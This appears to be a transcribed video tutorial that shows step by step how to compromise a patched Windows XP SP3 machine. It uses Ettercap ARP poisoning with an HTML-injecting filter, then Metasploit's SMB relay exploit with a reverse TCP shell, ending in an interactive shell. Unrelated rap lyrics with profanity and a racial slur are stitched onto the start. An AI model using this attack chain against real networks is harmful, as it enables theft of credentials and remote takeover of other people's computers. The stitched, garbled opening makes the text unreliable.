It goes a little something like this. Fuck the police coming straight out the underground. A young nigga got his bag cause I'm brown. And I'm the undercover, so police think they have the authority to kill a minority. Fuck that shit cause I ain't the one.
Okay, in this video we're going to use Backtrack 3 to get a shell on a fully patched XP Service Pack 3 box, as you can see here. File sharing has to be enabled for this exploit to work, and simple file sharing has to be disabled, which we're going to do right now. As a note, simple file sharing is enabled by default, but it is common for businesses and users to disable this option. This option can only be changed in XP Pro, not Home Edition. By disabling simple file sharing, a user has to enter a username and a password to access any shared folders on that computer. One more thing, the user has to set up a password. It cannot be blank for this to work. So once that's set, we're going to start off by using Backtrack 3, and we're going to have to write some code. This is the code here I've already written. This code is going to be used in EtherCap as a filter to do some ARP poisoning. This code is for Internet Explorer. There is another code for Firefox, but basically what this code does is replace any HTML code you want in your target's web page while they surf the internet. And what we've done is set it up so that while the target surfs the internet, Internet Explorer is going to try and access a network share, in this case an image, and we're going to use that to exploit the box. Now you're going to have to input your IP address in the code here, and once you've done that, go ahead and save it as smb.filter. Okay, now we need to compile the filter for EtherCap to use. So go ahead and open up a command shell, and we're going to type ether filter smb.filter for the file we just created, -o. This is going to be our output file, smb.ef. Enter, and as you can see, EtherFilter accepted the code. So now we need to set up EtherFilter to use the filter we just wrote. So type EtherCap -t-q -f smb.ef -m ARP / our target's IP. You can use this filter as directed towards a specific target, or you could leave this area blank and it would target the entire network. And //-p autoadd -i and our interface. Okay, now we're not going to execute this just yet. We need to set up Metasploit first. So let's open Metasploit Framework 3 MSFC. Once Metasploit is open, we're going to type show exploits to see a list of exploits. We're going to type use, and we're going to use the Windows SMB /SMB-relay exploit. So we're going to go ahead and copy that and paste it and press enter. Then we need to type show payloads, and we're using a reverse TCP. So we're going to type set payload. It's going to be Windows shell reverse TCP. Copy and paste that. Now we need to type show options. we're going to set the SMB host as your target's IP address. Then we need to set lhost as your IP address. You can also change the port by selecting set L port, but we're just going to leave it default for now. And then we're going to go ahead and type exploit to start. As you can see, server started. So now we need to go back to EtherCap shell and start that. Okay, so now they're both up and running. We need to go back to our target computer, and we're gonna start surfing the internet. Okay, now let's go back to our computer and see what happened while we were surfing. As you can see, EtherCap filtered out the HTML with our new code to get the target's computer to access a remote share. It said, in order for you to get this information, I need to see your credentials. Our computer said, okay, here they are. And we said thank you very much for your username and password, and we're going to go ahead and pass that on to Metasploit, and Metasploit should give us a session. And there we go. So once we have a username and password from EtherCap, it's supposed to go ahead and exit that, otherwise it's going to keep asking for credentials from the target computer. And so we're just going to go ahead and exit that out. So go ahead and exit EtherCap, and then we're going to go back to Metasploit. Okay, now we're going to type sessions-l, and as you can see we have a command shell. Type sessions-i1, and there you have it.